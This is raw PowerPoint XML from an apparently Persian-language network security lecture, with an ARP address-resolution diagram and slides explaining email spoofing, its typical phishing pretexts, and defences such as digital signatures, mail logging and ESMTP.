            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>I have 10.10.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>My MAC is [00-E0-2B-13-68-00] </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2819400"/>
            <a:ext cx="4572000" cy="3276600"/>
            <a:chOff x="2208" y="1776"/>
            <a:chExt cx="2880" cy="2064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105488" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="0" cy="2064"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105489" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2496" y="3840"/>
              <a:ext cx="768" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105490" name="Text Box 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3225" y="2796"/>
              <a:ext cx="1863" cy="372"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>I have 10.10.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>My MAC is [??-??-??-??-??-??]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105491" name="Line 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2208" y="1776"/>
              <a:ext cx="1056" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>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par>
                                <p:cTn id="13" presetID="5" presetClass="entr" presetSubtype="1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par>
                                <p:cTn id="16" presetID="9" presetClass="emph" presetSubtype="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr rctx="PPT">
                                        <p:cTn id="17" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.opacity</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="0.5"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="image" prLst="opacity: 0.5">
                                      <p:cBhvr rctx="IE">
                                        <p:cTn id="18" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="2" presetClass="entr" presetSubtype="4"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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1654175"/>
            <a:ext cx="6400800" cy="5203825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150531" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="304800"/>
            <a:ext cx="7493677" cy="5232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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Email Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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71</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="7493677" cy="5232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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>The Entire E-mail System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2623641213"/>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7391400" cy="914400"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>mail spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Subtitle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fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>در اين حمله نفوذ گر اقدام به ارسال پست الکترونيکي با نام جعلي يا از طرف ديگران مي کند .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>عمل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t> emil spoofing  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>به شيوه هاي متفاوتي صورت مي گيرد ولي نتايج مشابهي را به بار مي آورد:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPct val="65000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2300" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>کاربر ايميلي را دريافت مي کند که به نظر مي رسد از يک منبع معتبر رسيده در حالي که از يک منبع جعلي رسيده است .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300" smtClean="0">
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPct val="65000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Email spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2300" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>غالبا تلاش مي کند که کاربر را وادار به احکام تخريبي يا وارد کردن اطلاعات حساس (مانند کلمه عبور  يا شماره کارت اعتباري ) خود  بکند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>spoof  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t> امکان پذير است زيرا پروتکل</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t> که پرکاربردترين پروتکل ارسال ايميل است عمل احراز اصالت کاربر</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>را انجام نمي دهد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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72</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2823464362"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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a:no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fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کاربرد جعل ايميل </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>ايميلي که ادعا مي کند ازطرف مدير سيستم شماست و از شما مي خواهد که کلمه عبور خودتان را تغيير دهيد وگرنه حساب کاربري شما را معلق مي کند. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>يا شخصي که ادعا مي کند داراي اختياراتي از طرف موسسات مالي يا حقوقي شماست و از شما مي خواهد که کلمه عبور يا اطلاعات حياتي خود را براي وي ارسال کنيد و....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3393117660"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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066800" y="0"/>
            <a:ext cx="7620000" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Sample SMTP interaction</a:t>
            </a:r>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135169" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="901109"/>
            <a:ext cx="6324600" cy="5956891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2990289415"/>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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{75BF0514-154F-437A-816C-6723C1E5BBF2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156674" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="228600"/>
            <a:ext cx="13011150" cy="7315200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123163224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534400" cy="838200"/>
          </a:xfrm>
          <a:no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fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>راهکارهاي جلوگيري </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>email spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>استفاده از امضا ديجيتال به منظور احراز اصالت ايميل </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>اطمينان ازاين که سرويس دهنده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>شما مجهز به فايل هاي واقعه نگاري است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>استفاده از پروتکل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ESMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> به جای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3384539400"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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143000" y="0"/>
            <a:ext cx="7543800" cy="990600"/>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a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Basic DNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
